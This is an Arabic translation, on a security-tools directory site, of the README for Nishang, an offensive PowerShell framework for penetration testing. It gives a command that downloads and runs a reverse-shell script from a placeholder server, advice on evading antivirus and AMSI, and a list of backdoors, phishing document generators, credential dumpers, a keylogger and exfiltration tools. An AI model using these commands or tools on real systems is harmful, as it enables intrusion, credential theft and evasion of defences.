Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
nishang — Nishang - باور شيل الهجومي لفريق الاختراق الأحمر، اختبار الاختراق والأمن الهجومي. | Kitploit
أدوات/GitHubGitHub/samratashok/nishang
كسر كلمات المرورأدوات التصيدتصعيد الامتيازاتتوليد الحمولةالاستغلالالحركة الجانبيةتسريب البياناتجمع المعلوماتما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالفريق الأحمر
10.0k2.5kمنذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubsamratashok/nishang

nishang

Nishang - باور شيل الهجومي لفريق الاختراق الأحمر، اختبار الاختراق والأمن الهجومي.

عرض المستودع

نيشانغ

نيشانغ هو إطار عمل ومجموعة من السكريبتات والحمولات التي تتيح استخدام باورشيل للأمن الهجومي واختبار الاختراق وتمارين الفريق الأحمر. نيشانغ مفيد خلال جميع مراحل اختبار الاختراق.

بقلم Nikhil Mittal مؤسس Altered Security - تدريب عملي على الأمن المؤسسي والفريق الأحمر!

الاستخدام

قم باستيراد جميع السكريبتات في جلسة باورشيل الحالية (من إصدار باورشيل v3 فصاعدًا).

root@kitploit:~
PS C:\nishang> Import-Module .\nishang.psm1

استخدم السكريبتات الفردية باستخدام dot sourcing.

root@kitploit:~
PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1

PS C:\nishang> Get-Information

للحصول على المساعدة حول أي سكريبت أو دالة، استخدم:

root@kitploit:~
PS C:\nishang> Get-Help [scriptname] -full

لاحظ أن المساعدة متاحة للدالة التي تم تحميلها بعد تشغيل السكريبت وليس للسكريبت نفسه منذ الإصدار 0.3.8. في جميع الحالات، اسم الدالة هو نفس اسم السكريبت.

على سبيل المثال، لرؤية المساعدة حول Get-WLAN-Keys.ps1، استخدم

root@kitploit:~
PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1

PS C:\nishang> Get-Help Get-WLAN-Keys -Full

مكافحة الفيروسات

يتم الإبلاغ عن سكريبتات نيشانغ من قبل العديد من برامج مكافحة الفيروسات باعتبارها ضارة. السكريبتات على الهدف يُقصد بها أن تُستخدم في الذاكرة وهو أمر سهل جدًا باستخدام باورشيل. طريقتان أساسيتان لتنفيذ سكريبتات باورشيل في الذاكرة:

الطريقة 1. استخدام التحميل والتنفيذ في الذاكرة: استخدم الأمر أدناه لتنفيذ سكريبت باورشيل من شل بعيدة، شل ميتيربريتر الأصلي، شل ويب، إلخ. والدالة التي يصدرها. جميع السكريبتات في نيشانغ تصدر دالة بنفس الاسم في جلسة باورشيل الحالية.

root@kitploit:~
powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]

الطريقة 2. استخدام المعامل -encodedcommand (أو -e) الخاص بباورشيل جميع السكريبتات في نيشانغ تصدر دالة بنفس الاسم في جلسة باورشيل الحالية. لذلك، تأكد من استدعاء الدالة في السكريبت نفسه عند استخدام معامل encodedcommand من شل غير باورشيل. للمثال أعلاه، أضف استدعاء دالة (بدون علامات اقتباس) "Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]".

قم بتشفير السكريبت باستخدام Invoke-Encode من نيشانغ:

root@kitploit:~
PS C:\nishang> . \nishang\Utility\Invoke-Encode

PS C:\nishang> Invoke-Encode -DataToEncode C:\nishang\Shells\Invoke-PowerShellTcp.ps1 -OutCommand

البيانات المشفرة كُتبت إلى .\encoded.txt

الأمر المشفر كُتب إلى .\encodedcommand.txt

من أعلاه، استخدم السكريبت المشفر من encodedcommand.txt وقم بتشغيله على هدف حيث يمكن تنفيذ الأوامر (شل بعيدة، شل ميتيربريتر الأصلي، شل ويب، إلخ.). استخدمه كما يلي:

root@kitploit:~
C:\Users\target> powershell -e [encodedscript]

إذا استمر اكتشاف السكريبتات، فإن تغيير أسماء الدوال والمعاملات وإزالة محتوى المساعدة سيساعد.

في حال كان AMSI في ويندوز 10 لا يزال يحظر تنفيذ السكريبت، راجع هذه المدونة: http://www.labofapenetrationtester.com/2016/09/amsi.html

السكريبتات

يحتوي نيشانغ حاليًا على السكريبتات والحمولات التالية.

ActiveDirectory

Set-DCShadowPermissions

تعديل كائنات AD لتوفير الحد الأدنى من الأذونات المطلوبة لـ DCShadow.

Antak - شل الويب

Antak

تنفيذ سكريبتات باورشيل في الذاكرة، تشغيل الأوامر، وتحميل ورفع الملفات باستخدام شل الويب هذا.

البوابات الخلفية (Backdoors)

HTTP-Backdoor

باب خلفي يمكنه استقبال التعليمات من مواقع الطرف الثالث وتنفيذ سكريبتات باورشيل في الذاكرة.

DNS_TXT_Pwnage

باب خلفي يمكنه استقبال الأوامر وسكريبتات باورشيل من استعلامات DNS TXT، وتنفيذها على الهدف، والتحكم به عن بُعد باستخدام الاستعلامات.

Execute-OnTime

باب خلفي يمكنه تنفيذ سكريبتات باورشيل في وقت معين على الهدف.

Gupt-Backdoor

باب خلفي يمكنه استقبال الأوامر والسكريبتات من SSID لشبكة WLAN دون الاتصال بها.

Add-ScrnSaveBackdoor

باب خلفي يمكنه استخدام شاشة توقف ويندوز لتنفيذ الأوامر والسكريبتات عن بُعد.

Invoke-ADSBackdoor

باب خلفي يمكنه استخدام تدفقات البيانات البديلة (ADS) وسجل ويندوز لتحقيق الثبات (persistence).

Add-RegBackdoor

باب خلفي يستخدم خدعة Debugger المعروفة لتنفيذ الحمولة مع مفاتيح Sticky keys و Utilman (مفتاح ويندوز + U).

Set-RemoteWMI

تعديل أذونات مساحات أسماء DCOM و WMI للسماح بالوصول لمستخدم غير مسؤول (non-admin).

Set-RemotePSRemoting

تعديل أذونات الباورشيل عن بُعد (PSRemoting) للسماح بالوصول لمستخدم غير مسؤول (non-admin).

Bypass

Invoke-AmsiBypass

تنفيذ للطرق المعروفة علنًا لتجاوز/تجنب AMSI.

Client

Out-CHM

إنشاء ملفات CHM مصابة يمكنها تنفيذ أوامر وسكريبتات باورشيل.

Out-Word

إنشاء ملفات Word وإصابة الملفات الموجودة لتشغيل أوامر وسكريبتات باورشيل.

Out-Excel

إنشاء ملفات Excel وإصابة الملفات الموجودة لتشغيل أوامر وسكريبتات باورشيل.

Out-HTA

إنشاء ملف HTA يمكن نشره على خادم ويب واستخدامه في حملات التصيد.

Out-Java

إنشاء ملفات JAR موقعة يمكن استخدامها مع applets لتنفيذ السكريبتات والأوامر.

Out-Shortcut

إنشاء ملفات اختصار قادرة على تنفيذ أوامر وسكريبتات باورشيل.

Out-WebQuery

إنشاء ملفات IQY لصيد بيانات الاعتماد وتجزئات SMB.

Out-JS

إنشاء ملفات JS قادرة على تنفيذ أوامر وسكريبتات باورشيل.

Out-SCT

إنشاء ملفات SCT قادرة على تنفيذ أوامر وسكريبتات باورشيل.

Out-SCF

إنشاء ملف SCF يمكن استخدامه لالتقاط تحديات تجزئة NTLM.

Escalation

Enable-DuplicateToken

عندما تكون صلاحيات SYSTEM مطلوبة.

Remove-Update

إدخال ثغرات عن طريق إزالة التصحيحات.

Invoke-PsUACme

تجاوز UAC.

Execution

Download-Execute-PS

تنزيل وتنفيذ سكريبت باورشيل في الذاكرة.

Download_Execute

تنزيل ملف تنفيذي بصيغة نصية، تحويله إلى ملف تنفيذي، وتنفيذه.

Execute-Command-MSSQL

تشغيل أوامر باورشيل، أوامر أصلية، أو أوامر SQL على خادم MSSQL بصلاحيات كافية.

Execute-DNSTXT-Code

تنفيذ شيل كود (shellcode) في الذاكرة باستخدام استعلامات DNS TXT.

Out-RundllCommand

تنفيذ أوامر وسكريبتات باورشيل أو جلسة باورشيل عكسية باستخدام rundll32.exe.

Gather

Check-VM

التحقق من وجود جهاز افتراضي.

Copy-VSS

نسخ ملف SAM باستخدام خدمة Volume Shadow Copy.

Invoke-CredentialsPhish

خداع مستخدم لإعطاء بيانات اعتماد بنص واضح.

FireBuster FireListener

زوج من السكريبتات لاختبار التسلل الخارجي (egress testing)

Get-Information

الحصول على معلومات ثمينة من الهدف.

Get-LSASecret

الحصول على سر LSA من الهدف.

Get-PassHashes

الحصول على تجزئات كلمات المرور من الهدف.

Get-WLAN-Keys

الحصول على مفاتيح WLAN بنص واضح من الهدف.

Keylogger

تسجيل ضغطات المفاتيح من الهدف.

Invoke-MimikatzWdigestDowngrade

تفريغ كلمات مرور المستخدمين بنص واضح على ويندوز 8.1 وسيرفر 2012

Get-PassHints

الحصول على تلميحات كلمات المرور لمستخدمي ويندوز من الهدف.

Show-TargetScreen

الاتصال العكسي وبث شاشة الهدف باستخدام MJPEG.

Invoke-Mimikatz

تحميل Mimikatz في الذاكرة. محدث مع بعض التخصيص.

Invoke-Mimikittenz

استخراج معلومات ثمينة من ذاكرة العمليات المستهدفة (مثل المتصفحات) باستخدام regex.

Invoke-SSIDExfil

تسريب معلومات مثل بيانات اعتماد المستخدم باستخدام SSID لشبكة WLAN.

Invoke-SessionGopher

تحديد صناديق القفز الإدارية و/أو أجهزة الكمبيوتر المستخدمة للوصول إلى أجهزة Unix.

MITM

Invoke-Interceptor

وكيل HTTPS محلي لهجمات MITM.

Pivot

Create-MultipleSessions

التحقق من بيانات الاعتماد على أجهزة كمبيوتر متعددة وإنشاء جلسات PSSessions.

Run-EXEonRemote نسخ وتنفيذ ملف تنفيذي على أجهزة متعددة.

Invoke-NetworkRelay إنشاء مرحلات شبكة بين أجهزة الكمبيوتر.

Prasadhak

Prasadhak

التحقق من تجزئات العمليات الجارية ضد قاعدة بيانات VirusTotal.

Scan

Brute-Force

هجوم القوة العمياء على FTP، Active Directory، MSSQL، و Sharepoint.

Port-Scan

أداة ماسح منافذ مفيدة.

Powerpreter

Powerpreter

جميع وظائف نيشانغ في وحدة سكريبت واحدة.

Shells

Invoke-PsGcat

إرسال الأوامر والسكريبتات إلى حساب Gmail محدد ليتم تنفيذها بواسطة Invoke-PsGcatAgent

Invoke-PsGcatAgent

تنفيذ الأوامر والسكريبتات المرسلة بواسطة Invoke-PsGcat.

Invoke-PowerShellTcp

شل باورشيل تفاعلي عكسي أو ملزم (reverse connect or bind shell)

Invoke-PowerShellTcpOneLine

نسخة منزوعة من Invoke-PowerShellTcp. تحتوي أيضًا على نسخة هيكلية يمكن أن تتناسب مع تغريدتين.

Invoke-PowerShellTcpOneLineBind

النسخة الملزمة من Invoke-PowerShellTcpOneLine.

Invoke-PowerShellUdp

شل باورشيل تفاعلي عكسي أو ملزم عبر UDP

Invoke-PowerShellUdpOneLine

نسخة منزوعة من Invoke-PowerShellUdp.

Invoke-PoshRatHttps

باورشيل تفاعلي عكسي عبر HTTPS.

Invoke-PoshRatHttp

باورشيل تفاعلي عكسي عبر HTTP.

Remove-PoshRat

تنظيف النظام بعد استخدام Invoke-PoshRatHttps

Invoke-PowerShellWmi

باورشيل تفاعلي باستخدام WMI.

Invoke-PowerShellIcmp

شل باورشيل عكسي تفاعلي عبر ICMP.

Invoke-JSRatRundll

شل باورشيل عكسي تفاعلي عبر HTTP باستخدام rundll32.exe.

Invoke-JSRatRegsvr

شل باورشيل عكسي تفاعلي عبر HTTP باستخدام regsvr32.exe.

Utility

Add-Exfiltration

إضافة قدرة تسريب البيانات إلى Gmail، Pastebin، خادم ويب، و DNS لأي سكريبت.

Add-Persistence

إضافة قدرة الثبات عند إعادة التشغيل إلى سكريبت.

Remove-Persistence

إزالة الثبات الذي تمت إضافته بواسطة سكريبت Add-Persistence.

Do-Exfiltration

استخدم هذه (|) مع أي سكريبت لتسريب المخرجات.

Download

نقل ملف إلى الهدف.

Parse_Keys

تحليل المفاتيح التي تم تسجيلها بواسطة keylogger.

Invoke-Encode

تشفير وضغط سكريبت أو سلسلة نصية.

Invoke-Decode

فك تشفير وفك ضغط سكريبت أو سلسلة نصية من Invoke-Encode.

Start-CaptureServer

تشغيل خادم ويب يسجل مصادقة Basic وتجزئات SMB.

ConvertTo-ROT13

تشفير سلسلة نصية إلى ROT13 أو فك تشفير سلسلة ROT13.

Out-DnsTxt

إنشاء سجلات DNS TXT يمكن استخدامها مع سكريبتات أخرى.

[Base64ToString]

[StringToBase64]

[ExetoText]

[TexttoExe]

التحديثات

يمكن العثور على تحديثات حول نيشانغ على مدونتي http://labofapenetrationtester.com وتغريداتي على تويتر @nikhil_mitt.

الأخطاء والملاحظات وطلبات الميزات

يرجى فتح issue إذا واجهت خطأ أو كان لديك طلب ميزة. يمكنك مراسلتي عبر البريد الإلكتروني على nikhil [dot] uitrgpv at gmail.com

القائمة البريدية

للملاحظات والمناقشات وطلبات الميزات، انضم إلى: http://groups.google.com/group/nishang-users

المساهمة

أنا دائمًا أبحث عن مساهمين لنيشانغ. يرجى تقديم الطلبات أو مراسلتي عبر البريد الإلكتروني.

منشورات المدونة

بعض منشورات المدونة المفيدة للمبتدئين:

http://www.labofapenetrationtester.com/2014/06/nishang-0-3-4.html

http://labofapenetrationtester.com/2012/08/introducing-nishang-powereshell-for.html

http://labofapenetrationtester.com/2013/08/powerpreter-and-nishang-Part-1.html

http://www.labofapenetrationtester.com/2013/09/powerpreter-and-nishang-Part-2.html

جميع المنشورات عن نيشانغ:

http://www.labofapenetrationtester.com/search/label/Nishang

تنزيل الأداة